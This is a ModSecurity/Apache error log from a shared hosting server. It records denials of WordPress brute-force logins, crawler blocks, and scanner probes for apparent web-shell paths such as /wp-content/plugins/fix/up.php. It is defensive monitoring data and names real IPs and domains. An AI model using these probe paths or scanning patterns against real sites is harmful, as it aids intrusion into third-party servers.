[Tue May 26 19:17:02.932604 2026] [security2:error] [pid 26857:tid 27091] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkVtfoqtHEG_e9i6HCRQAAAO0"]
[Tue May 26 19:17:03.118767 2026] [security2:error] [pid 26857:tid 27014] [client 114.119.128.253:39385] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousebbe/dcadee1875696.shtml"] [unique_id "ahWkV9foqtHEG_e9i6HCZAAAAKA"], referer: http://ghanemgh.com/prespontaneousebbe/dcadee1875696.shtml
[Tue May 26 19:17:04.965169 2026] [security2:error] [pid 26857:tid 27088] [client 130.51.22.201:55457] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWkWNfoqtHEG_e9i6HCkwAAAOo"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 19:17:05.484914 2026] [security2:error] [pid 26857:tid 27034] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkWdfoqtHEG_e9i6HCwwAAALQ"]
[Tue May 26 19:17:07.867889 2026] [security2:error] [pid 26857:tid 27002] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkW9foqtHEG_e9i6HDMQAAAJQ"]
[Tue May 26 19:17:08.800078 2026] [security2:error] [pid 26857:tid 27113] [client 63.178.84.147:12920] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWkXNfoqtHEG_e9i6HDeAAAAQM"], referer: https://thegoodsporting.com
[Tue May 26 19:17:09.669070 2026] [security2:error] [pid 26857:tid 27081] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkXdfoqtHEG_e9i6HDlQAAAOM"]
[Tue May 26 19:17:09.814783 2026] [security2:error] [pid 26857:tid 27058] [client 14.227.98.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkXdfoqtHEG_e9i6HDnQAAAMw"]
[Tue May 26 19:17:11.185236 2026] [security2:error] [pid 26857:tid 27021] [client 45.154.98.38:53851] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "landsonlogistics.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWkX9foqtHEG_e9i6HD8AAAAKc"]
[Tue May 26 19:17:11.741670 2026] [security2:error] [pid 26857:tid 27067] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkX9foqtHEG_e9i6HD-QAAANU"]
[Tue May 26 19:17:11.821473 2026] [security2:error] [pid 26857:tid 26925] [remote 74.7.241.58:60824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWkX9foqtHEG_e9i6HEFAAAiUM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:17:12.152693 2026] [security2:error] [pid 26857:tid 27079] [client 45.154.98.38:55439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahWkX9foqtHEG_e9i6HEGQAAAOE"]
[Tue May 26 19:17:12.947031 2026] [security2:error] [pid 26857:tid 26964] [remote 211.23.68.235:48370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkYNfoqtHEG_e9i6HEQAAAn2o"]
[Tue May 26 19:17:13.557979 2026] [security2:error] [pid 26857:tid 27048] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkYdfoqtHEG_e9i6HEVgAAAMI"]
[Tue May 26 19:17:15.299297 2026] [security2:error] [pid 26857:tid 26936] [remote 172.104.164.56:35154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkY9foqtHEG_e9i6HEwAAAxE4"]
[Tue May 26 19:17:15.733466 2026] [security2:error] [pid 26857:tid 27091] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkY9foqtHEG_e9i6HEyQAAAO0"]
[Tue May 26 19:17:17.610641 2026] [security2:error] [pid 26857:tid 27103] [client 45.154.98.38:53348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahWkZdfoqtHEG_e9i6HFQgAAAPk"]
[Tue May 26 19:17:17.610751 2026] [security2:error] [pid 26857:tid 27103] [client 45.154.98.38:53348] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "landsonlogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahWkZdfoqtHEG_e9i6HFQgAAAPk"]
[Tue May 26 19:17:17.737106 2026] [security2:error] [pid 26857:tid 27019] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkZdfoqtHEG_e9i6HFLAAAAKU"]
[Tue May 26 19:17:18.403592 2026] [security2:error] [pid 26857:tid 26890] [remote 154.26.132.116:59414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkZtfoqtHEG_e9i6HFZAAA2iA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:17:19.096387 2026] [security2:error] [pid 26857:tid 27016] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkZtfoqtHEG_e9i6HFcQAAAKI"]
[Tue May 26 19:17:21.605798 2026] [security2:error] [pid 26857:tid 27028] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkadfoqtHEG_e9i6HF7wAAAK4"]
[Tue May 26 19:17:21.968486 2026] [core:error] [pid 26857:tid 27045] [client 45.154.98.236:58723] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 19:17:21.968510 2026] [core:error] [pid 26857:tid 27045] [client 45.154.98.236:58723] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 19:17:21.978046 2026] [autoindex:error] [pid 26857:tid 27067] [client 45.154.98.236:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/greenfood/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:17:22.020370 2026] [security2:error] [pid 26857:tid 27020] [client 45.154.98.236:51784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWkadfoqtHEG_e9i6HGFQAAAKY"]
[Tue May 26 19:17:22.022453 2026] [security2:error] [pid 26857:tid 27048] [client 45.154.98.236:61481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWkadfoqtHEG_e9i6HGGQAAAMI"], referer: www.google.com
[Tue May 26 19:17:22.034053 2026] [security2:error] [pid 26857:tid 27098] [client 45.154.98.236:59153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWkadfoqtHEG_e9i6HGFgAAAPQ"], referer: www.google.com
[Tue May 26 19:17:22.115158 2026] [security2:error] [pid 26857:tid 26925] [remote 50.6.192.190:41074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWkadfoqtHEG_e9i6HGFAAAjUM"]
[Tue May 26 19:17:22.178533 2026] [security2:error] [pid 26857:tid 27024] [client 45.154.98.236:63155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/fefijlfm.php"] [unique_id "ahWkatfoqtHEG_e9i6HGIgAAAKo"], referer: www.google.com
[Tue May 26 19:17:22.258373 2026] [core:error] [pid 26857:tid 27097] [client 45.154.98.236:55517] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 19:17:22.258393 2026] [core:error] [pid 26857:tid 27097] [client 45.154.98.236:55517] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 19:17:22.461678 2026] [security2:error] [pid 26857:tid 27010] [client 45.154.98.236:59348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWkatfoqtHEG_e9i6HGNQAAAJw"], referer: www.google.com
[Tue May 26 19:17:22.474654 2026] [security2:error] [pid 26857:tid 26942] [remote 50.6.192.190:41074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWkatfoqtHEG_e9i6HGNAAA2VQ"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 19:17:22.611651 2026] [security2:error] [pid 26857:tid 27058] [client 45.154.98.236:51498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWkatfoqtHEG_e9i6HGQgAAAMw"], referer: www.google.com
[Tue May 26 19:17:23.073263 2026] [security2:error] [pid 26857:tid 27033] [client 45.154.98.236:49872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/inbfqfrq.php"] [unique_id "ahWka9foqtHEG_e9i6HGVgAAALM"], referer: www.google.com
[Tue May 26 19:17:23.508681 2026] [security2:error] [pid 26857:tid 27093] [client 74.7.230.33:41924] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWka9foqtHEG_e9i6HGcQAA71I"]
[Tue May 26 19:17:23.817503 2026] [security2:error] [pid 26857:tid 27107] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWka9foqtHEG_e9i6HGZwAAAP0"]
[Tue May 26 19:17:24.280179 2026] [security2:error] [pid 26857:tid 26968] [remote 47.128.47.135:14656] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/2015a-AiravataKandy.php"] [unique_id "ahWkbNfoqtHEG_e9i6HGlwAAyW4"]
[Tue May 26 19:17:25.251461 2026] [security2:error] [pid 26857:tid 27051] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkbNfoqtHEG_e9i6HGsAAAAMU"]
[Tue May 26 19:17:26.753045 2026] [security2:error] [pid 26857:tid 26860] [remote 5.78.119.122:56794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWkbtfoqtHEG_e9i6HHAAAA_QI"]
[Tue May 26 19:17:27.234835 2026] [security2:error] [pid 26857:tid 26872] [remote 18.190.7.192:38702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkb9foqtHEG_e9i6HHFAAA9g4"]
[Tue May 26 19:17:27.882129 2026] [security2:error] [pid 26857:tid 26859] [remote 18.190.7.192:38702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkb9foqtHEG_e9i6HHKwAAuQE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:17:28.011073 2026] [security2:error] [pid 26857:tid 27080] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkb9foqtHEG_e9i6HHJQAAAOI"]
[Tue May 26 19:17:29.958992 2026] [security2:error] [pid 26857:tid 27082] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkcdfoqtHEG_e9i6HHhgAAAOQ"]
[Tue May 26 19:17:30.678912 2026] [security2:error] [pid 26857:tid 27003] [client 38.51.28.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWkctfoqtHEG_e9i6HHswAAAJU"]
[Tue May 26 19:17:32.319306 2026] [security2:error] [pid 26857:tid 27003] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkc9foqtHEG_e9i6HIAgAAAJU"]
[Tue May 26 19:17:33.440230 2026] [security2:error] [pid 26857:tid 27110] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkdNfoqtHEG_e9i6HIQAAAAQA"]
[Tue May 26 19:17:33.807585 2026] [security2:error] [pid 26857:tid 27053] [client 114.119.138.207:43349] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWkddfoqtHEG_e9i6HIZQAAAMc"], referer: https://ilmiraabsalyamova.ru/component/k2/item/6-creating-ideas-to-save-energy?start=117440
[Tue May 26 19:17:35.289264 2026] [security2:error] [pid 26857:tid 27039] [client 113.169.212.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkdtfoqtHEG_e9i6HInQAAALk"]
[Tue May 26 19:17:35.617243 2026] [security2:error] [pid 26857:tid 27005] [client 85.208.96.201:29312] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahWkd9foqtHEG_e9i6HIygAAAJc"]
[Tue May 26 19:17:35.617349 2026] [security2:error] [pid 26857:tid 27005] [client 85.208.96.201:29312] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahWkd9foqtHEG_e9i6HIygAAAJc"]
[Tue May 26 19:17:36.848416 2026] [security2:error] [pid 26857:tid 26967] [remote 51.91.98.45:47894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWkeNfoqtHEG_e9i6HJAQAA5m0"]
[Tue May 26 19:17:36.859009 2026] [security2:error] [pid 26857:tid 27033] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkeNfoqtHEG_e9i6HI9AAAALM"]
[Tue May 26 19:17:37.642650 2026] [security2:error] [pid 26857:tid 27101] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkedfoqtHEG_e9i6HJHwAAAPc"]
[Tue May 26 19:17:39.126028 2026] [security2:error] [pid 26857:tid 27105] [client 45.12.3.121:58487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 121.3.12.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eduvil.org.md-74.webhostbox.net"] [uri "/images/images/cache.php"] [unique_id "ahWke9foqtHEG_e9i6HJfAAAAPs"]
[Tue May 26 19:17:40.021990 2026] [security2:error] [pid 26857:tid 27004] [client 191.101.157.243:52728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.157.101.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWkfNfoqtHEG_e9i6HJswAAAJY"]
[Tue May 26 19:17:40.116354 2026] [security2:error] [pid 26857:tid 27088] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWke9foqtHEG_e9i6HJoAAAAOo"]
[Tue May 26 19:17:42.099937 2026] [security2:error] [pid 26857:tid 27076] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkfdfoqtHEG_e9i6HKCAAAAN4"]
[Tue May 26 19:17:43.299380 2026] [security2:error] [pid 26857:tid 26921] [remote 51.79.254.190:38418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.254.79.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWkf9foqtHEG_e9i6HKVQAA8T8"]
[Tue May 26 19:17:44.002377 2026] [security2:error] [pid 26857:tid 27040] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkf9foqtHEG_e9i6HKeQAAALo"]
[Tue May 26 19:17:45.597863 2026] [security2:error] [pid 26857:tid 27049] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkgdfoqtHEG_e9i6HKxAAAAMM"]
